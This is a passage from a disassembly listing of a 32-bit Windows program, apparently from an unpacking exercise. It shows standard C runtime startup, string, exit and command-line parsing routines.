test eax, 0FF000000h
jz short loc_40277F
jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
arg_0 = dword ptr 4
cmp ds:dword_406CEC, 1
jle short loc_40282A
push 107h
push [esp+4+arg_0]
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, [esp+arg_0]
mov ecx, ds:off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40283E proc near ; CODE XREF: start+7�j
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_4050AC ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_406F5C, ecx
shr eax, 10h
mov ds:dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
pop ecx
loc_4028AA: ; CODE XREF: sub_40283E+62�j
mov [ebp+var_4], esi
call sub_4031D7
call ds:dword_4050A8 ; GetCommandLineA
mov ds:dword_407458, eax
call sub_4030A5
mov ds:dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp+var_30], esi
lea eax, [ebp+var_5C]
push eax
call ds:dword_4050A4 ; GetStartupInfoA
call sub_402D47
mov [ebp+var_64], eax
test byte ptr [ebp+var_30], 1
jz short loc_4028F7
movzx eax, [ebp+var_2C]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: sub_40283E+B1�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: sub_40283E+B7�j
push eax
push [ebp+var_64]
push esi
push esi
call ds:dword_4050A0 ; GetModuleHandleA
push eax
call sub_402029
mov [ebp+var_60], eax
push eax
call sub_402AEE
mov eax, [ebp+var_14]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp+var_68], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
sub_40283E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+arg_0]
call sub_4035C9
push 0FFh
call ds:off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
sub_402959 proc near ; CODE XREF: sub_40283E+66�p
arg_0 = dword ptr 4
cmp ds:dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+arg_0]
call sub_4035C9
pop ecx
push 0FFh
call ds:dword_4050B0 ; ExitProcess
retn
sub_402959 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, ds:off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, ds:off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: sub_40283E+93�p
mov eax, ds:dword_407454
test eax, eax
jz short loc_402ACC
call eax
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
sub_402AEE proc near ; CODE XREF: sub_40283E+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_406F94, edi
jnz short loc_402B2D
push [esp+4+arg_0]
call ds:dword_4050B8 ; GetCurrentProcess
push eax
call ds:dword_4050B4 ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_406F90, edi
mov ds:byte_406F8C, bl
jnz short loc_402B81
mov eax, ds:dword_407450
test eax, eax
jz short loc_402B70
mov ecx, ds:dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, ds:dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+arg_0]
mov ds:dword_406F94, edi
call ds:dword_4050B0 ; ExitProcess
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BC3 proc near ; CODE XREF: sub_40283E+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, ds:dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, ds:dword_406D70
mov edx, ds:dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, ds:dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov ds:dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov ds:dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov ds:dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov ds:dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov ds:dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov ds:dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov ds:dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push ds:dword_406D7C
push 8
call ebx ; _lread
pop ecx
mov ds:dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; _lread
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+arg_4]
call ds:dword_4050BC ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_406D78
cmp ds:dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: sub_40283E+A5�p
cmp ds:dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, ds:dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: sub_40283E+8E�p
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, ds:dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_406F74, esi
jnz short loc_402DF3
push 9
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, ds:dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push ds:dword_406F40
call sub_403C87
pop ecx
mov ds:dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: sub_40283E+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:dword_405034 ; GetModuleFileNameA
mov eax, ds:dword_407458
mov ds:off_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_406F6C, esi
pop edi
pop esi
mov ds:dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test ds:byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test ds:byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: sub_40283E+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4070A0
push ebx
push ebp
mov ebp, ds:dword_4050D0
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov ds:dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call ds:dword_4050CC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov ds:dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
